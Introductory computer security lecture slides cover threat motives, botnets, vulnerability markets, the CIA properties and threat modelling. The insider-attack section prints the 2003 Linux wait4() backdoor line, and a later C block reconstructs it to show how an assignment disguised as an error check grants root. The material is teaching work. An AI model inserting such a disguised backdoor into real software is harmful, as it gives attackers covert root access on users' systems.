Introduction: Security Analysis & Threat Models
Dawn Song

Administrivia
• Piazza
– Primary point of contact
• Course text book
– None!
• No office hours, discussion this week
– Starts Sept 5th
• If you can't make discussion…
• No lecture next Monday, Sept 3rd

What is Computer Security?
• Allow intended use of computer systems
• Prevent unintended use that may cause harm

Personal Data & Files
Grant authorized users access to read, create personal files
Prevent unauthorized users from reading, modifying, or deleting personal

Banking Funds
Allow customer to view balance, transfer funds, make payments
Prevent third party access to account; customers defrauding bank
Prevent other browser tabs, applications from reading banking info

Personal Privacy
Allow friends to view status updates, photos, location data
Prevent strangers, advertisers from accessing profile
Prevent strangers, applications from posting updates as you

Threats

Exploration, Disruption, Personal Reputation
• 1990s:
– Phone phreaking, free calls
• Early 2000s:
– Email worms
– CodeRed, MyDoom, Sobig

Financially Motivated
• Shift in late 2000s
• Spam
– Pharmaceuticals
– Fake products
• Carding/Fraud
– Identity theft, credit fraud

Politically Motivated
• Stuxnet, Flame, Gauss
– Iranian nuclear infrastructure
– Lebanese banking information
– Wiretapping

Other Motives?
Current Vulnerability Trends

MITRE tracks vulnerability disclosures
Cumulative disclosures; percentage from web applications (2010)
Source: IBM X-Force, Mar 2011. Data: http://cve.mitre.org/

Operating system vulnerabilities

Trends in client-side vulnerabilities
Browser security improving; primarily Flash after 2008
Source: IBM X-Force, Mar 2011

Reported Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities

Web vs System vulnerabilities
XSS peak

Mobile Operating Systems
Mobile OS vulnerabilities vs. Mobile OS exploits
Compare number of vulnerabilities with exploits. What can you expect next year?
Source: IBM X-Force, Mar 2011

Summary
• Many current attacks are financially motivated
• Vulnerabilities prevalent, half related to the Web
– Browser vulnerabilities decreasing, but plug-ins pose risk
– Some improvements in defending against common attacks
• Mobile platforms receiving increasing attention

Payloads

Why own machines: 1. IP address and bandwidth stealing
Attacker's goal: look like a random Internet user
Use the infected machine's IP address for:
• Spam (e.g. the Storm botnet)
– Spamalytics: 1:12M pharma spams leads to purchase; 1:260K greeting card spams leads to infection
• Denial of Service: services: 1 hour (20$), 24 hours (100$)
• Click fraud (e.g. Clickbot.a)

Why own machines: 2. Steal user credentials
Keylog for banking passwords, web passwords, gaming pwds.
Example: SilentBanker (2007)
User requests login page → Bank sends login page → Malware injects Javascript → When user submits the information needed to log in, it is also sent to the attacker
Similar mechanism used by Zeus botnet

Why own machines: 3.
Spread to isolated systems
Example: Stuxnet
Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network
More on this later in course

Server-side attacks
• Financial data theft: often credit card numbers
– example: malicious software installed on servers of a single retailer stole 45M credit cards (2007)
• Political motivation: Aurora, Tunisia Facebook (Feb. 2011)
• Infect visiting users

Example: Mpack (2007)
• PHP-based tools installed on compromised web sites
– Embedded as an iframe on infected page
– Infects browsers that visit site
• Features
– management console provides stats on infection rates
– Sold for several 100$
– Customer care can be purchased, one-year support contract
• Impact: 500,000 infected sites (compromised via SQL injection)
– Several defenses: e.g. Google Safe Browsing

Insider attacks: example
Hidden trap door in Linux (Nov 2003)
– Allows attacker to take over a computer
– Practically undetectable change (uncovered via CVS logs)
Inserted line in wait4():
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
Looks like a standard error check, but …
See: http://lwn.net/Articles/57135/

Many more examples
• Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks
• SysAdmin for city of SF government. Changed passwords, locking out city from router access
• Inside logic bomb took down 2000 UBS servers

Monetization

Marketplace for Vulnerabilities
Option 1: bug bounty programs
• Google Vulnerability Reward Program: 3K $
• Mozilla Bug Bounty program: 500$
• Pwn2Own competition: 15K $
Option 2:
• ZDI, iDefense: 2K – 25K $

Marketplace for Vulnerabilities
Option 3: black market
Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf)

Marketplace for owned machines
Pay-per-install (PPI) services: clients (spam, keylogger, bot) → PPI service → Victims
PPI operation:
1. Own victim's machine
2.
Download and install client's code
3. Charge client
Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

Marketplace for owned machines
Clients (spam, bot, keylogger) → PPI service → Victims
Cost: US – 100-180$ / 1000 machines; Asia – 7-8$ / 1000 machines
Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

The computer security problem
Two factors:
• Lots of buggy software (and gullible users)
• Money can be made from finding and exploiting vulns.
1. Marketplace for vulnerabilities
2. Marketplace for owned machines (PPI)
3. Many methods to profit from owned client machines
⇒ current state of computer security

Formally Defining Security

What is Computer Security About?
• General goals:
– Allow intended use of computer systems
– Prevent unintended use that may cause harm
• More precisely…

Basic Security Properties (I)
• Confidentiality:
– Information is only disclosed to authorized people or systems
– E.g., attackers cannot learn your banking info

Basic Security Properties (II)
• Integrity:
– Information cannot be tampered with in an unauthorized way
– E.g., attacker cannot change the balance of your bank account

Basic Security Properties (III)
• Availability:
– Information and services are accessible in a timely fashion to authorized people or systems
– E.g., you should be able to log in and perform transactions on your online banking account when you want to

Basic Security Properties: CIA
• Confidentiality
• Integrity
• Availability

Security Analysis
• Given a computer system, one may ask: Is the computer system secure?

Is the House Secure?

It Depends …
• What are the assets? What are the goals?
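Returning to the wait4() trap door from the insider-attack slide above: the following is an added user-space reconstruction (not code from the lecture or from the Linux kernel), with a constructed task struct and flag values standing in for the kernel's current and wait4() options, placing the inserted line next to the genuine comparison it imitates.

```c
#include <stdio.h>

/* Constructed stand-ins for the kernel's task struct and the wait4() flag
 * values, so the inserted line can be exercised outside the kernel. */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u
#define EINVAL   22

struct task { unsigned int uid; };

/* The 2003 insertion as reported: `=` where `==` belongs. When options
 * carries both flags the caller's uid is set to 0 (root); the assignment
 * evaluates to 0, so the && is false and retval is never set. The extra
 * parentheses around the assignment also keep GCC's -Wparentheses quiet,
 * which is why it reads like an ordinary argument check. */
static long wait4_backdoored(struct task *current, unsigned int options)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The genuine error check: compares uid, never assigns it. */
static long wait4_checked(struct task *current, unsigned int options)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one variant for a constructed caller and report the uid afterwards;
 * 0 means the caller became root. */
static unsigned int uid_after(long (*fn)(struct task *, unsigned int),
                              unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    fn(&t, options);
    return t.uid;
}

/* Same, but report the return value the caller sees. */
static long retval_for(long (*fn)(struct task *, unsigned int),
                       unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    return fn(&t, options);
}

int main(void)
{
    unsigned int both = __WCLONE | __WALL;
    printf("backdoored: uid 1000 -> %u, retval %ld\n",
           uid_after(wait4_backdoored, 1000, both), retval_for(wait4_backdoored, 1000, both));
    printf("checked:    uid 1000 -> %u, retval %ld\n",
           uid_after(wait4_checked, 1000, both), retval_for(wait4_checked, 1000, both));
    return 0;
}
```

The only observable difference is that an unprivileged caller passing both flags leaves the backdoored version with uid 0 and no error, which is what made the change so hard to spot in review.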
It Depends …
• Threat model
– In SafeLand, you don't need to lock the door
– Attackers who pick locks
– Attackers who drive a bulldozer
– Attackers who have super advanced technology
– Attackers who may know you well

Is the House Secure?
• Is the house's protection mechanism strong enough to protect the assets from attackers in a certain threat model?

Which Threat Model Should You Choose?

Cost of Security
• Should you always build & evaluate a system secure against the strongest attacker?
– A student may simply not be able to afford an alarm system
• Not about perfect security
Perfect Security ↔ Risk Analysis

Is the Computer System Secure?
• Is the system's protection mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model?

Key Elements to Security Analysis
Security properties + Threat model → Security analysis ?

Threat Model
• Assumptions on attackers' abilities and resources
Examples: 0Day, Network Eavesdropper, DDoS, MITM Attack, DES Cracker

Which Threat Models to Choose?
• For the grade database system for your class?
• For your phone?
• For a major online banking site?
• For the system to control nuclear weapon launch?

Cost of Security
• There's no free lunch.
• There's no free security.
• Cost of security
– Expensive to develop
– Performance overhead
– Inconvenience to users

Prioritize Your Security Solution according to Your Threat Model
• No one wants to pay more for security than what they have to lose
• Not about perfect security
– Risk analysis
Perfect Security ↔ Risk Analysis

Changing Threat Model
• Be careful when your threat model changes
– E.g., online account
Over time….
New account, nothing of value; no incentive for attackers → Account accumulates value; more incentive for attackers

Design Impacts Cost of Security
• Good system design & architecture can reduce cost of security

Design Impacts Cost of Security
Known unpatched vulnerabilities, 18 Jan. 2012. Secunia columns: Extremely critical, Highly critical, Moderately critical, Less critical, Not critical; SecurityFocus column: Total. Each cell gives number / oldest advisory. Non-zero cells per browser, in the order extracted (all other cells 0):

Browser              Non-zero cells (number / oldest)
Google Chrome 16     1 / 13 December 2011
Internet Explorer 6  4 / 17 November 2004; 8 / 27 February 2004; 12 / 5 June 2003; 534 / 20 November 2000
Internet Explorer 7  1 / 30 October 2006; 4 / 6 June 2006; 9 / 5 June 2003; 213 / 15 August 2006
Internet Explorer 8  1 / 26 February 2007; 7 / 5 June 2003; 123 / 14 January 2009
Internet Explorer 9  1 / 6 December 2011; 26 / 5 March 2011
Firefox 3.6          1 / 20 December 2011
Firefox 9            none
Opera 11             1 / 6 December 2011; 2 / 6 December 2011
Safari 5             1 / 8 June 2010; 2 / 13 December 2011

"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>.
"Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>.

End of Segment